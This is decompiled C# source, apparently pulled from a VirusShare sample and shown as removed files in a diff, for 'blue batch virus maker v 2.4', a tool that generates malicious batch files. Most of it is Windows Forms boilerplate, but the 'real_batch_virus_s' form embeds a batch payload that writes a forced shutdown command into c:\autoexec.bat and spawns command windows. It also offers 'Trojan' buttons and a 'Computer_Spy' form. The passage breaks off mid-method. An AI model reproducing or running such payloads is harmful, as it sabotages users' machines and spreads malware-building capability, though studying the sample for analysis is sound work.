xattribute = (XAttribute) null;
break;
}
checked { ++index; }
}
}
if (xattribute != null)
{
xattribute.Remove();
attributes.Add(xattribute);
}
}
}
}
}
}
return e;
}
}
}

View File

@ -1,86 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.My.MyApplication
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace blue_batch_virus_maker_v_2._4.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
[DebuggerNonUserCode]
static MyApplication()
{
}
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
lock (MyApplication.__ENCList)
{
if (MyApplication.__ENCList.Count == MyApplication.__ENCList.Capacity)
{
int index1 = 0;
int num = checked (MyApplication.__ENCList.Count - 1);
int index2 = 0;
while (index2 <= num)
{
if (MyApplication.__ENCList[index2].IsAlive)
{
if (index2 != index1)
MyApplication.__ENCList[index1] = MyApplication.__ENCList[index2];
checked { ++index1; }
}
checked { ++index2; }
}
MyApplication.__ENCList.RemoveRange(index1, checked (MyApplication.__ENCList.Count - index1));
MyApplication.__ENCList.Capacity = MyApplication.__ENCList.Count;
}
MyApplication.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
}
[STAThread]
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
MyApplication.__ENCAddToList((object) this);
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}

View File

@ -1,24 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.My.MyComputer
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace blue_batch_virus_maker_v_2._4.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}

View File

@ -1,284 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.My.MyProject
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace blue_batch_virus_maker_v_2._4.My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public batch_maker m_batch_maker;
public Computer_Spy m_Computer_Spy;
public Form1 m_Form1;
public real_batch_virus_s m_real_batch_virus_s;
public warning_for_the_hal m_warning_for_the_hal;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public batch_maker batch_maker
{
[DebuggerNonUserCode] get
{
this.m_batch_maker = MyProject.MyForms.Create__Instance__<batch_maker>(this.m_batch_maker);
return this.m_batch_maker;
}
[DebuggerNonUserCode] set
{
if (value == this.m_batch_maker)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<batch_maker>(ref this.m_batch_maker);
}
}
public Computer_Spy Computer_Spy
{
[DebuggerNonUserCode] get
{
this.m_Computer_Spy = MyProject.MyForms.Create__Instance__<Computer_Spy>(this.m_Computer_Spy);
return this.m_Computer_Spy;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Computer_Spy)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Computer_Spy>(ref this.m_Computer_Spy);
}
}
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
public real_batch_virus_s real_batch_virus_s
{
[DebuggerNonUserCode] get
{
this.m_real_batch_virus_s = MyProject.MyForms.Create__Instance__<real_batch_virus_s>(this.m_real_batch_virus_s);
return this.m_real_batch_virus_s;
}
[DebuggerNonUserCode] set
{
if (value == this.m_real_batch_virus_s)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<real_batch_virus_s>(ref this.m_real_batch_virus_s);
}
}
public warning_for_the_hal warning_for_the_hal
{
[DebuggerNonUserCode] get
{
this.m_warning_for_the_hal = MyProject.MyForms.Create__Instance__<warning_for_the_hal>(this.m_warning_for_the_hal);
return this.m_warning_for_the_hal;
}
[DebuggerNonUserCode] set
{
if (value == this.m_warning_for_the_hal)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<warning_for_the_hal>(ref this.m_warning_for_the_hal);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}

View File

@ -1,76 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.My.MySettings
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace blue_batch_virus_maker_v_2._4.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
bool lockTaken = false;
try
{
Monitor.Enter(handlerLockObject, ref lockTaken);
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
if (lockTaken)
Monitor.Exit(handlerLockObject);
}
}
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}

View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.My.MySettingsProperty
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace blue_batch_virus_maker_v_2._4.My
{
[CompilerGenerated]
[HideModuleName]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}

View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.Resources
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace blue_batch_virus_maker_v_2._4
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) blue_batch_virus_maker_v_2._4.Resources.resourceMan, (object) null))
blue_batch_virus_maker_v_2._4.Resources.resourceMan = new ResourceManager("blue_batch_virus_maker_v_2._4.Resources", typeof (blue_batch_virus_maker_v_2._4.Resources).Assembly);
return blue_batch_virus_maker_v_2._4.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => blue_batch_virus_maker_v_2._4.Resources.resourceCulture;
set => blue_batch_virus_maker_v_2._4.Resources.resourceCulture = value;
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,796 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.real_batch_virus_s
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using blue_batch_virus_maker_v_2._4.My;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace blue_batch_virus_maker_v_2._4
{
[DesignerGenerated]
public class real_batch_virus_s : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
[AccessedThroughProperty("Button3")]
private Button _Button3;
[AccessedThroughProperty("RichTextBox1")]
private RichTextBox _RichTextBox1;
[AccessedThroughProperty("ProgressBar1")]
private ProgressBar _ProgressBar1;
[AccessedThroughProperty("Button5")]
private Button _Button5;
[AccessedThroughProperty("Button6")]
private Button _Button6;
[AccessedThroughProperty("RichTextBox2")]
private RichTextBox _RichTextBox2;
[AccessedThroughProperty("Button7")]
private Button _Button7;
[AccessedThroughProperty("Button8")]
private Button _Button8;
[AccessedThroughProperty("RichTextBox3")]
private RichTextBox _RichTextBox3;
[AccessedThroughProperty("Button9")]
private Button _Button9;
[AccessedThroughProperty("Button10")]
private Button _Button10;
[AccessedThroughProperty("RichTextBox4")]
private RichTextBox _RichTextBox4;
[AccessedThroughProperty("Panel1")]
private Panel _Panel1;
[DebuggerNonUserCode]
static real_batch_virus_s()
{
}
[DebuggerNonUserCode]
public real_batch_virus_s()
{
this.Load += new EventHandler(this.real_batch_virus_s_Load);
real_batch_virus_s.__ENCAddToList((object) this);
this.InitializeComponent();
}
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
lock (real_batch_virus_s.__ENCList)
{
if (real_batch_virus_s.__ENCList.Count == real_batch_virus_s.__ENCList.Capacity)
{
int index1 = 0;
int num = checked (real_batch_virus_s.__ENCList.Count - 1);
int index2 = 0;
while (index2 <= num)
{
if (real_batch_virus_s.__ENCList[index2].IsAlive)
{
if (index2 != index1)
real_batch_virus_s.__ENCList[index1] = real_batch_virus_s.__ENCList[index2];
checked { ++index1; }
}
checked { ++index2; }
}
real_batch_virus_s.__ENCList.RemoveRange(index1, checked (real_batch_virus_s.__ENCList.Count - index1));
real_batch_virus_s.__ENCList.Capacity = real_batch_virus_s.__ENCList.Count;
}
real_batch_virus_s.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (real_batch_virus_s));
this.Button1 = new Button();
this.Button2 = new Button();
this.Button3 = new Button();
this.RichTextBox1 = new RichTextBox();
this.ProgressBar1 = new ProgressBar();
this.Button5 = new Button();
this.Button6 = new Button();
this.RichTextBox2 = new RichTextBox();
this.Button7 = new Button();
this.Button8 = new Button();
this.RichTextBox3 = new RichTextBox();
this.Button9 = new Button();
this.Button10 = new Button();
this.RichTextBox4 = new RichTextBox();
this.Panel1 = new Panel();
this.SuspendLayout();
this.Button1.BackColor = Color.Black;
this.Button1.ForeColor = Color.Lime;
Button button1_1 = this.Button1;
Point point1 = new Point(-2, -2);
Point point2 = point1;
button1_1.Location = point2;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
Size size1 = new Size(130, 23);
Size size2 = size1;
button1_2.Size = size2;
this.Button1.TabIndex = 0;
this.Button1.Text = "Trojan bat lucky";
this.Button1.UseVisualStyleBackColor = false;
this.Button2.BackColor = Color.Black;
this.Button2.ForeColor = Color.Lime;
Button button2_1 = this.Button2;
point1 = new Point(219, -2);
Point point3 = point1;
button2_1.Location = point3;
this.Button2.Name = "Button2";
Button button2_2 = this.Button2;
size1 = new Size(87, 29);
Size size3 = size1;
button2_2.Size = size3;
this.Button2.TabIndex = 1;
this.Button2.Text = "Back";
this.Button2.UseVisualStyleBackColor = false;
this.Button3.BackColor = Color.Black;
this.Button3.ForeColor = Color.Lime;
Button button3_1 = this.Button3;
point1 = new Point(126, -2);
Point point4 = point1;
button3_1.Location = point4;
this.Button3.Name = "Button3";
Button button3_2 = this.Button3;
size1 = new Size(75, 23);
Size size4 = size1;
button3_2.Size = size4;
this.Button3.TabIndex = 2;
this.Button3.Text = "Save File";
this.Button3.UseVisualStyleBackColor = false;
this.Button3.Visible = false;
this.RichTextBox1.BackColor = Color.Black;
this.RichTextBox1.ForeColor = Color.Lime;
RichTextBox richTextBox1_1 = this.RichTextBox1;
point1 = new Point(0, 95);
Point point5 = point1;
richTextBox1_1.Location = point5;
this.RichTextBox1.Name = "RichTextBox1";
RichTextBox richTextBox1_2 = this.RichTextBox1;
size1 = new Size(306, 138);
Size size5 = size1;
richTextBox1_2.Size = size5;
this.RichTextBox1.TabIndex = 3;
this.RichTextBox1.Text = componentResourceManager.GetString("RichTextBox1.Text");
this.RichTextBox1.Visible = false;
this.ProgressBar1.BackColor = Color.Black;
this.ProgressBar1.Dock = DockStyle.Bottom;
this.ProgressBar1.ForeColor = Color.Yellow;
ProgressBar progressBar1_1 = this.ProgressBar1;
point1 = new Point(0, 223);
Point point6 = point1;
progressBar1_1.Location = point6;
this.ProgressBar1.Name = "ProgressBar1";
ProgressBar progressBar1_2 = this.ProgressBar1;
size1 = new Size(306, 10);
Size size6 = size1;
progressBar1_2.Size = size6;
this.ProgressBar1.Style = ProgressBarStyle.Continuous;
this.ProgressBar1.TabIndex = 4;
this.ProgressBar1.Visible = false;
this.Button5.BackColor = Color.Black;
this.Button5.ForeColor = Color.Lime;
Button button5_1 = this.Button5;
point1 = new Point(-2, 21);
Point point7 = point1;
button5_1.Location = point7;
this.Button5.Name = "Button5";
Button button5_2 = this.Button5;
size1 = new Size(130, 23);
Size size7 = size1;
button5_2.Size = size7;
this.Button5.TabIndex = 10;
this.Button5.Text = "Trojan bat zapchest";
this.Button5.UseVisualStyleBackColor = false;
this.Button6.BackColor = Color.Black;
this.Button6.ForeColor = Color.Lime;
Button button6_1 = this.Button6;
point1 = new Point(126, 21);
Point point8 = point1;
button6_1.Location = point8;
this.Button6.Name = "Button6";
Button button6_2 = this.Button6;
size1 = new Size(75, 23);
Size size8 = size1;
button6_2.Size = size8;
this.Button6.TabIndex = 11;
this.Button6.Text = "Save File";
this.Button6.UseVisualStyleBackColor = false;
this.Button6.Visible = false;
this.RichTextBox2.BackColor = Color.Black;
this.RichTextBox2.ForeColor = Color.Lime;
RichTextBox richTextBox2_1 = this.RichTextBox2;
point1 = new Point(0, 95);
Point point9 = point1;
richTextBox2_1.Location = point9;
this.RichTextBox2.Name = "RichTextBox2";
RichTextBox richTextBox2_2 = this.RichTextBox2;
size1 = new Size(306, 138);
Size size9 = size1;
richTextBox2_2.Size = size9;
this.RichTextBox2.TabIndex = 12;
this.RichTextBox2.Text = "@echo on\n@echo shutdown -s -f -t 1 >> c:\\autoexec.bat\nstart cmd.exe\nstart cmd.exe\n\n";
this.RichTextBox2.Visible = false;
this.Button7.BackColor = Color.Black;
this.Button7.ForeColor = Color.Lime;
Button button7_1 = this.Button7;
point1 = new Point(-2, 43);
Point point10 = point1;
button7_1.Location = point10;
this.Button7.Name = "Button7";
Button button7_2 = this.Button7;
size1 = new Size(130, 23);
Size size10 = size1;
button7_2.Size = size10;
this.Button7.TabIndex = 13;
this.Button7.Text = "Trojan space eater";
this.Button7.UseVisualStyleBackColor = false;
this.Button8.BackColor = Color.Black;
this.Button8.ForeColor = Color.Lime;
Button button8_1 = this.Button8;
point1 = new Point(126, 43);
Point point11 = point1;
button8_1.Location = point11;
this.Button8.Name = "Button8";
Button button8_2 = this.Button8;
size1 = new Size(75, 23);
Size size11 = size1;
button8_2.Size = size11;
this.Button8.TabIndex = 14;
this.Button8.Text = "Save File";
this.Button8.UseVisualStyleBackColor = false;
this.Button8.Visible = false;
this.RichTextBox3.BackColor = Color.Black;
this.RichTextBox3.ForeColor = Color.Lime;
RichTextBox richTextBox3_1 = this.RichTextBox3;
point1 = new Point(0, 95);
Point point12 = point1;
richTextBox3_1.Location = point12;
this.RichTextBox3.Name = "RichTextBox3";
RichTextBox richTextBox3_2 = this.RichTextBox3;
size1 = new Size(306, 138);
Size size12 = size1;
richTextBox3_2.Size = size12;
this.RichTextBox3.TabIndex = 15;
this.RichTextBox3.Text = componentResourceManager.GetString("RichTextBox3.Text");
this.RichTextBox3.Visible = false;
this.Button9.BackColor = Color.Black;
this.Button9.ForeColor = Color.Lime;
Button button9_1 = this.Button9;
point1 = new Point(126, 66);
Point point13 = point1;
button9_1.Location = point13;
this.Button9.Name = "Button9";
Button button9_2 = this.Button9;
size1 = new Size(75, 23);
Size size13 = size1;
button9_2.Size = size13;
this.Button9.TabIndex = 17;
